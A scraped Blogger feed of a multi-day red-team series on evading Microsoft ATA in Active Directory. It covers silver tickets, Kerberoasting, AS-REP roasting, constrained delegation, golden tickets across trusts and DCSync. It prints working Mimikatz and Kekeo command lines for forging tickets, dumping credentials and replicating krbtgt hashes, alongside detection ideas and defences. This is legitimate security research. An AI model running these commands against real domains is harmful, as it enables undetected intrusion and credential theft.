- Many behavior based detections could not be replicated in the lab and are more powerful and useful in a real environment.<br />
- Behavior based detection may detect lateral movement even if the anomaly based detection is bypassed – use the avoidance techniques (Day 4) in such cases.<br />
<div>
<br /></div>
<b>Evading ATA forever</b><br />
What happens when the bypasses we discussed are fixed? We modify our methods and techniques. I have seen fellow red teamers using Golden ticket or Skeleton key just to brag about it in their reports. No matter how frustrating they are, we as good attackers need to focus on the goals of the assessment. Not only it helps in meeting those deadlines, it also helps in avoiding pesky detection mechanisms ;) For example, there is no need to go for DA if the goal of the assessment can be completed without it, stay focused!<br />
<br />
<b>Defences</b><br />
More from my BlackHat slides:<br />
<div style="text-align: justify;">
- ATA even if can’t detect anomalies, provides interesting insight in the traffic exchanged with the Domain Controller. Use that to detect the attackers. </div>
<div style="text-align: justify;">
- Limit your DAs to login only to Domain Controllers. Remember prevention is better than cure. </div>
<br />
<div style="text-align: justify;">
-Implement possible architectural changes suggested here: <a href="https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access">https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access</a></div>
<div>
<br /></div>
<b>Microsoft's Response</b><br />
Microsoft's ATA team is awesome! They contacted me (and MSRC contacted me as well) when my talk was scheduled and we worked together to address and understand each other. I always found them very open to the idea that researches like this actually make a product better. It was actually fun exchanging ideas with them!<br />
<br />
That is all for the week of Avading Microsoft ATA. Hope you enjoyed it as much as I enjoyed writing it :) Please leave questions, feedback and comemnts :)<br />
<br />
<br />
<br /></div>
</div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-80393542415922981362017-08-11T21:29:00.000+05:302018-05-03T22:15:43.989+05:30Week of Evading Microsoft ATA - Day 4 - Silver ticket, Kerberoast and SQL Servers<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
This is Day 4 of Week of Evading Microsoft ATA. The week has been split in the following days:</div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b>Day 4 - Bypasses/avoidance by reducing conversation with the DC</b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b><br />
<b><br />
</b> Day 4 is dedicated to those attacks which need minimum and normal communication with the domain controller and thus ATA. That is, after bypassing ATA on first three days, today we will discuss how ATA can be avoided.<br />
<br />
<b>Silver Ticket</b><br />
<b><br />
</b>If get our hands on NTLM hash of a service account, it is possible to create a TGS (Ticket Granting Service) and present it to the service to get access. As we would be creating a TGS, there is no communication with DC. Read more about silver ticket attack <a href="https://digital-forensics.sans.org/blog/2014/11/24/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-more">in this post</a>. Now, if we are not talking to the DC, <b>ATA can't read the traffic and thus, there is no detection</b>. As simple as that!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxzZa4hqslO1cZ5MWYQlX2SPtGBFnoiSw62mcXDphmXkKe7LYXTe69U3fkSU15h5KfNIHdTXpUJvy8QkjQILPc-E_qgBsERxw0wiGa1j_E8xmxz2FuLetSYqqe94ADpAgbar0M8sqnSk/s1600/Silver_Ticket.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="778" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxzZa4hqslO1cZ5MWYQlX2SPtGBFnoiSw62mcXDphmXkKe7LYXTe69U3fkSU15h5KfNIHdTXpUJvy8QkjQILPc-E_qgBsERxw0wiGa1j_E8xmxz2FuLetSYqqe94ADpAgbar0M8sqnSk/s400/Silver_Ticket.png" width="400" /></a></div>
<br />
<br />
What intrigued me during testing was even if a silver ticket is used for a service running on the DC, ATA still won't detect it. We can use the NTLM/RC4 hash of the DC's machine account for some very interesting services like CIFS, WMI, PowerShell Remoting. LDAP etc. Since we already have DA access on Day 2, the ability to create a silver ticket for the DC is a decent persistence mechanism.<br />
<br />
Why a silver ticket is not detected even for the DC? I think ATA is currently interested only in authentication requests.<br />
<br />
<b>Kerberoast</b><br />
<b><br />
</b> Kerberoast attack involves requesting a TGS from the DC for a service, save the TGS (which is encrypted using the NTLM hash of the target service account) to a file and brute-force the NTLM hash. Read <a href="https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf">this</a> and <a href="https://adsecurity.org/?p=2293">this</a> article for more information.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5SN6_bGzJhzeAmDHAFmjXxMoSrl39N79ZETeXPhYAYmnkjdPZZttztxpGcL0YBxMZtElYi_v_AwQ4jk1M6q8Fe2FUxKXI9OBIDniSMP2UYew-l27tMg_c0dzHSu8hlVBTAWpQFX5N4Y/s1600/Kerberoast.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="778" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5SN6_bGzJhzeAmDHAFmjXxMoSrl39N79ZETeXPhYAYmnkjdPZZttztxpGcL0YBxMZtElYi_v_AwQ4jk1M6q8Fe2FUxKXI9OBIDniSMP2UYew-l27tMg_c0dzHSu8hlVBTAWpQFX5N4Y/s400/Kerberoast.png" width="400" /></a></div>
<br />
The only communication with the DC is when the TGS is requested from the DC. The DC gets TGS requests all day and spotting an anomaly in such a regular request is, well, not easy.<br />
<br />
Actually, there is a chance for detection based on anomaly. Remember the encryption type we discussed on Day 3? A TGS request with encryption type 0x17 (RC4) may be used as an indicator of a ticket request for Kerberoasting. How? Let's use the below code to request a TGS for a service:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/ops-sqlsrvone.offensiveps.com"</textarea></pre>
This is how it looks like in logs:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEdborioSH-aFDIZR715wxVSBSbx6Dzx4-0uz-E22zCHQQP_P02O-wqleoMc-_0f2z1-BP0iqxcdgU40jGohJcDpADZr6cng0Ssu9V4EeHGWDJOgKHTHT4pddAOjaYfcGjP6vapt_mDIQ/s1600/Constrained-Delegation-RC4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="543" data-original-width="718" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEdborioSH-aFDIZR715wxVSBSbx6Dzx4-0uz-E22zCHQQP_P02O-wqleoMc-_0f2z1-BP0iqxcdgU40jGohJcDpADZr6cng0Ssu9V4EeHGWDJOgKHTHT4pddAOjaYfcGjP6vapt_mDIQ/s400/Constrained-Delegation-RC4.png" width="400" /></a></div>
But there are many legit uses (legacy applications, service accounts, trusts etc.) which still use RC4, we can only hope that ATA starts detecting TGS requests using RC4 as malicious in a future release for those environments where AES is prevalent.<br />
<br />
<b>Kerberoast Variants</b><br />
<br />
There are two Kerberoast variants which are helpful in active directory dominance.<br />
<br />
<b>AS-REP</b><br />
Request a TGT for an account with Kerberos Pre-Authentication disabled (or force disable if we have sufficient rights), DC replies with TGT (AS-REP) which has a piece of information (emcrypted part) encrypted with the account's NTLM hash, save it to the disk and brute force offline. Please read <a href="http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws">this</a> and <a href="http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/">this</a> post for a detailed explanation.<br />
<br />
ATA doesn't detect this. Is there any anomaly which can be seen? Yes!<br />
<br />
After enumerating users with Pre-Auth disabled, send AS-REQ and receive AS-REP with encrypted part:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-ASREPHash -UserName unixuser -Verbose</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZnPrtZMgCHQliN0OpbdyFF1KSUIauGrRksJ-yujgU0Q16xIAU5BIr05WDYhU8rf3-2a8CH1STg3TNRS_zBUlwGRh6rJ6qtY2R5Bv9Z2xzHBtcGEk0SmRzVun-iGxPGmzV-T5Eg5nFls/s1600/AS-REP-Roasting.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="1353" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZnPrtZMgCHQliN0OpbdyFF1KSUIauGrRksJ-yujgU0Q16xIAU5BIr05WDYhU8rf3-2a8CH1STg3TNRS_zBUlwGRh6rJ6qtY2R5Bv9Z2xzHBtcGEk0SmRzVun-iGxPGmzV-T5Eg5nFls/s320/AS-REP-Roasting.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And this is how it looks like in Wireshark:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHojEAvKTIoqURHO7xr9_c0BbkR8URn_W-up2JEFtFmqypN3rss8zt_yXG5_xEU67EfxVgMUH2w9MozQ2IxsdnG9GvTnZFsjMY2wN0zr-QhJqw2qN4Iq4b8CmQ5v6ZjbUW7pSKBf2kNA/s1600/AS-REP-RC4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="688" data-original-width="931" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHojEAvKTIoqURHO7xr9_c0BbkR8URn_W-up2JEFtFmqypN3rss8zt_yXG5_xEU67EfxVgMUH2w9MozQ2IxsdnG9GvTnZFsjMY2wN0zr-QhJqw2qN4Iq4b8CmQ5v6ZjbUW7pSKBf2kNA/s400/AS-REP-RC4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And this is how it is logged:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeqKMm6ScXDkJknr4R83xR-7XLCr0JZ4Jt2wsQd1ZeT_6IP0NPjaH60QWcYHgv0pvQBtEAu1k1FBUoom-H94_sqq3JTuDowxSAHreDV3UbkjeWtJshEFGLnqh8hYe42xfArSsxTx0km_A/s1600/AS-REP_Log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="384" data-original-width="417" height="367" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeqKMm6ScXDkJknr4R83xR-7XLCr0JZ4Jt2wsQd1ZeT_6IP0NPjaH60QWcYHgv0pvQBtEAu1k1FBUoom-H94_sqq3JTuDowxSAHreDV3UbkjeWtJshEFGLnqh8hYe42xfArSsxTx0km_A/s400/AS-REP_Log.png" width="400" /></a></div>
Hello RC4 we met again :)<br />
<br />
As Will explains <a href="http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/">in this post</a>, cracking AS-REP encrypted part which uses RC4 is much easier then the AES one so chances of an attacker using AES are not common. An anomaly, if ATA would like to spot it :)<br />
<div>
<br /></div>
<b>Force SPN</b><br />
If we have enough privileges, it is possible to set a user's SPN to anything, request a TGS for that made up SPN and then, brute-force the ticket offline.<br />
<br />
Like in other TGS related attacks, a simple anomaly in this case could be use of RC4:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jgciEAEtVOq7khXZAauvhcBRZ5S4v-Z-GpCMfEikba-c37Hje7EnbtRSNdu3Ch9WeRGBhGafntqGy4Zxs0JT7yxp7bHLH7qBy7O2MpBG-xFFiOz8NyuAxuSQgpTes1yo3gJCUTE5tf8/s1600/Force-SPN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="390" data-original-width="561" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jgciEAEtVOq7khXZAauvhcBRZ5S4v-Z-GpCMfEikba-c37Hje7EnbtRSNdu3Ch9WeRGBhGafntqGy4Zxs0JT7yxp7bHLH7qBy7O2MpBG-xFFiOz8NyuAxuSQgpTes1yo3gJCUTE5tf8/s400/Force-SPN.png" width="400" /></a></div>
ATA doesn't detect it. ATA team commented that abnormal behaviour detection will catch this and AS-REP method when the brute-forced passwords are used to access a resource.<br />
<br />
<b>SQL Server</b><br />
<br />
Targeting SQL servers and staying within the database server makes sure that there is no communication with the DC and therefore, avoids ATA. I wrote a post couple of months back on <a href="http://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html">lateral movement within the database layer</a>.<br />
<br />
That is all for Day 4. Hope you enjoyed it!<br />
<br />
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com1tag:blogger.com,1999:blog-8135211063584500909.post-59103380334361764292017-08-09T20:49:00.000+05:302018-05-03T22:15:43.917+05:30Week of Evading Microsoft ATA - Day 3 - Constrained Delegation, Attacks across trusts, DCSync and DNSAdmins<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 3 of Week of Evading Microsoft ATA. The week has been split in the following days:</div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b>Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b><br />
<b><br />
</b>On Day 3, Let's see some more Kerberos attacks which can be used to bypass ATA. Also, since we already escalated to DA on Day 2, we will also discuss attacks across domain trusts which are not detected by ATA.<br />
<br />
<b>Constrained Delegation</b><br />
Constrained delegation allows access to a service by impersonating *any* user if the service account is configured so (msds-allowedtodelegateto). You can read more about this attack <a href="https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/">here</a>, <a href="http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/">here </a>and <a href="https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more">here</a>. All of the three are fantastic posts, please go through them to understand the attack.<br />
<br />
ATA doesn't detect this attack.Why? Read on.<br />
<br />
If we abuse unconstrained delegation with the help of <a href="https://github.com/gentilkiwi/kekeo">Kekeo</a>:<br />
<br />
Request a TGT:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop\Kekeo> .\asktgt.exe /user:termadmin /domain:offensiveps.com /key:2a758732e0f664f48a5747a9b12345ab /ticket:termadmin.kirbi</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn6xuvXUiGQ-wI0yQeW8r8FeOFTqBpZwbWzg-ZPvAZzvp5nKMqwPxFb3jVLaJfYysXYWG_bFSRVzyvMAKlM1e6dCmgQG4Fk5L3suwkGDs9jz8MEZGDQ6DFqlo0gQVocXhp-E4PIUiXpdY/s1600/Constrained-Delegation-AS_REQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="659" data-original-width="925" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn6xuvXUiGQ-wI0yQeW8r8FeOFTqBpZwbWzg-ZPvAZzvp5nKMqwPxFb3jVLaJfYysXYWG_bFSRVzyvMAKlM1e6dCmgQG4Fk5L3suwkGDs9jz8MEZGDQ6DFqlo0gQVocXhp-E4PIUiXpdY/s400/Constrained-Delegation-AS_REQ.png" width="400" /></a></div>
Request a TGS as Administrator using the above TGT:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop\Kekeo> .\s4u.exe /tgt:termadmin.kirbi /user:Administrator@offensiveps.com /service:cifs/ops-sqlsrvone.offensiveps.com</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3DMp31wBrS8cOed8tjzmR9OPsLSWwSkzjKgJN-fWOM8DgBKASsyUro-Myq9wyfvIKe9mHZ3Fi4ysc9xyOqTOfdpoTVLT_FutlzqKyooKHpVp-xLSJZkQfE08iks8M6I8MAaCQoVpg0l8/s1600/Constrained-Delegation-TGS_REQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="402" data-original-width="491" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3DMp31wBrS8cOed8tjzmR9OPsLSWwSkzjKgJN-fWOM8DgBKASsyUro-Myq9wyfvIKe9mHZ3Fi4ysc9xyOqTOfdpoTVLT_FutlzqKyooKHpVp-xLSJZkQfE08iks8M6I8MAaCQoVpg0l8/s400/Constrained-Delegation-TGS_REQ.png" width="400" /></a></div>
Encryption type 0x17 means RC4-HMAC. See <a href="https://blogs.technet.microsoft.com/askds/2010/10/19/hunting-down-des-in-order-to-securely-deploy-kerberos/">this article.</a><br />
<br />
Now, is 0x17 an anomaly? Not really, even though AES has been introduced since Server 2008, service accounts, inter-domain tickets and inter-forest tickets still use RC4 encryption. So there is no downgrade for ATA to detect, by default, as far as TGS_REQ is concerned.<br />
<br />
Once we have the TGS, it can be used in the current session to access the service:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::ptt cifs.ops-sqlsrvone.offensiveps.com.kirbi"'
PS C:\Users\labuser\Desktop> ls \\ops-sqlsrvone\c$
</textarea></pre>
<br />
Even if we force enable AES on the service account ATA doesn't detect it as we need to move the entire domain (trusts, legacy machines etc. still use RC4) to AES before 0x17 can be considered anomaly.<br />
<br />
I think there is one chance of detection, while requesting a TGT, there is an encryption downgrade for the AS-REQ packet (see the screenshot above). But it is up-to the ATA team to tune-it and make the detection reliable.<br />
<br />
Also, there is no detection for alternate tickets. It is possible to access any service running with the same service account as the service for which constrained delegation is enabled. See the section, "Server SPN target name validation level" in <a href="https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more">this article</a>. That means, if we have access to a service like time on the domain controller using constrained delgeation we can request a TGS for a service like HOST (Schedule tasks and many others), RPCSS (WMI), CIFS (File server) and take over the DC completely and ATA won't detect it. <br />
<br />
But please keep in mind that if we access the LDAP service and try to run DCSync attack (replication), ATA will detect it. In fact, during my testing, I found out that DCSync is one of those attacks which ATA rarely misses.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNsOeCRZw9ymj1tYoamSrtjgkMkqYNtfQos_SyQPn62af_ZNx7oBS8fKK5G_rLTe4ecjH_PFvZxJbAplNAdR1Cd52mocigOFzY3oLT96wFbeNgYK9zKIHrEJEZxNqwwCUBT-NjjNA3uwI/s1600/DCSync.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="352" data-original-width="1227" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNsOeCRZw9ymj1tYoamSrtjgkMkqYNtfQos_SyQPn62af_ZNx7oBS8fKK5G_rLTe4ecjH_PFvZxJbAplNAdR1Cd52mocigOFzY3oLT96wFbeNgYK9zKIHrEJEZxNqwwCUBT-NjjNA3uwI/s400/DCSync.png" width="400" /></a></div>
Above is based on my understanding of constrained delegation and service accounts. Please correct me if I messed up something :)<br />
<br />
The ATA team commented that they are "currently working on detecting abnormal delegation usage".<br />
<br />
<b>Attacks Across Trusts</b><br />
<b><br />
</b> Let's discuss couple of attacks across domain trusts. Many attacks across domain trusts are not detected. That inter-domain tickets use RC4 is one of the reasons for this. We will discuss only two of most interesting attacks, escalation from domain to forest root and DCSync (replication) without detection.<br />
<br />
<b>Escalation from domain DA to forest root enterprise admin</b><br />
<br />
It is well known that if we have DA access to one of the domains of a forest, it is possible to escalate privileges to the enterprise admin of the forest root. Read Sean's <a href="https://adsecurity.org/?p=1588">blog post here</a> to understand the attack.<br />
<br />
To use this attack, we just need the krbtgt hash of the current domain and some other information (domain SID, parent domain SID etc.) which is available to any normal user in active directory. We forge an inter-domain TGT, sign and encrypt with the krbtgt hash of child for validation and append SID history. When the parent DC receives this TGT for accessing a service in the parent domain, it reads the SID history and if it is set to Enterprise Admins, we are granted that privilege.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:childone.offensiveps.com /sid:S-1-5-21-1330358098-3724148463-1077246548 /krbtgt:d0cc884b251ef9bd34c439ec123456u8 /sids:S-1-5-21-3270384115-3177237293-604223748-519 /ptt"'
</textarea></pre>
<br />
Now, this is how the network capture looks like on the child DC when the above attack is executed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih4fDCYRVES1kopy1_qRzSgG355vN6QGrhJdhLH1WkZXz0bY7pzTKzJUo2Qe0CgbSMdnh-lyRbpTXdDU0SLM2-fnccg6RM7LapsT59XcB5VRMsKsDDRF-X_qeSt1w4zb8Jkr9TqCxKe9o/s1600/Across-Trust-Edited.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="879" data-original-width="1562" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih4fDCYRVES1kopy1_qRzSgG355vN6QGrhJdhLH1WkZXz0bY7pzTKzJUo2Qe0CgbSMdnh-lyRbpTXdDU0SLM2-fnccg6RM7LapsT59XcB5VRMsKsDDRF-X_qeSt1w4zb8Jkr9TqCxKe9o/s400/Across-Trust-Edited.png" width="400" /></a></div>
Because domain trusts use RC4 encryption by default what we see above is NOT a downgrade. To make this an anomaly, it will be required to enable the support of AES in the Trust properties in the Active Directory Domains and Trusts:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNd7SMyC3FvyoEJjJywOBx7DxEnBZ0jqK-IbicoEapBOq1j7-ZPywx5W7DxDbQEPJLnghuks6Nq4j5HJ57lsIu6kLmuYYhetBWatTjGBIgahIHsTkKqEqxF7XoEW4YxAruJFBslEWb38I/s1600/Domain_Trusts.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="743" data-original-width="1091" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNd7SMyC3FvyoEJjJywOBx7DxEnBZ0jqK-IbicoEapBOq1j7-ZPywx5W7DxDbQEPJLnghuks6Nq4j5HJ57lsIu6kLmuYYhetBWatTjGBIgahIHsTkKqEqxF7XoEW4YxAruJFBslEWb38I/s400/Domain_Trusts.png" width="400" /></a></div>
ATA currently does not take into account if AES is enabled for a trust.<br />
<br />
<b>DCSync across trust</b><br />
<br />
As I stated earlier, DCSync is rarely missed by ATA. But if it is done from a chilld domain controller, DCSync is not detected by ATA which makes sense as domain controllers replicate stuff all the time. Since we escalated to Enterprise Admin above, we have sufficient privileges to do so.<br />
<br />
First, using a golden ticket or overpass-the-hash, escalate privileges to DA on a member machine of child domain. Then run the below command from the member machine:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\childuser\Desktop> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:offensiveps.com /user:opsdc\krbtgt"' -ComputerName childone-dc </textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMok3A2rZPafoUrJYXHYFt8O-v_K6Q2rfrcISk9d8IbUK9OUUVIIuE17zNs595ZBjjk9e7eoHfQYhqV3VqagFeE_BnZSKMGWvwkQXQ0a3L3HOlfb7cHvCtRbG_UTSeYhdrtYtbGZiZpT4/s1600/DCSync.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="432" data-original-width="988" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMok3A2rZPafoUrJYXHYFt8O-v_K6Q2rfrcISk9d8IbUK9OUUVIIuE17zNs595ZBjjk9e7eoHfQYhqV3VqagFeE_BnZSKMGWvwkQXQ0a3L3HOlfb7cHvCtRbG_UTSeYhdrtYtbGZiZpT4/s400/DCSync.png" width="400" /></a></div>
ATA does not detect this! :)<br />
<br />
This makes it much easier to laterally move in the parent domain as we can extract AES keys and avoid detection later.<br />
<br />
<b>Abusing the DNSAdmins group membership</b><br />
<br />
Another attack which is not currently detected by ATA is the ability to run remote code as SYSTEM on a Windows DNS server (or DC - if it works as DNS server as well). Read <a href="https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83">this post</a> and <a href="http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html">this one</a> by me for more details. Also, DNSAdmins is not a protected group :)<br />
<br />
That is all for Day 3!<br />
<br />
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-7522756498844434242017-08-08T21:07:00.003+05:302018-05-03T22:15:43.966+05:30Week of Evading Microsoft ATA - Day 2 - Overpass-the-hash and Golden Ticket<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 2 of Week of Evading Microsoft ATA. The week has been split in the following days:</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b>Day 2 - Detection and bypass of overpass-the-hash and golden ticket</b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b></div>
</div>
</div>
<div style="text-align: justify;">
<b><br />
</b></div>
<div style="text-align: justify;">
We left Day 1 with admin access to the box where a domain admin (DA) token is available. The next step is to get access to the credentials of the DA. Here, credentials could be clear text password, NTLM hash, AES keys, user token etc. </div>
<div style="text-align: justify;">
<br />
<b>Overpass-the-hash</b><br />
Let's pull hashes for the DA "tempDA" using Invoke-Mimikatz:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -ComputerName ops-applocked</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2IdHo46kVTNhJ0Z6e1qEo38gfHxqDJQbIVmDSWoE6c6BXctaJKbxPkQS0VMg3UEpg5hkyCRkDI0aUMz5ifR32JOVveujj_3rknKTW7yi_wbXFlGOwE81RQsUQB1t_utHvk5orsaeHPmw/s1600/DA-NTLM-Hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="446" data-original-width="868" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2IdHo46kVTNhJ0Z6e1qEo38gfHxqDJQbIVmDSWoE6c6BXctaJKbxPkQS0VMg3UEpg5hkyCRkDI0aUMz5ifR32JOVveujj_3rknKTW7yi_wbXFlGOwE81RQsUQB1t_utHvk5orsaeHPmw/s400/DA-NTLM-Hash.png" width="400" /></a></div>
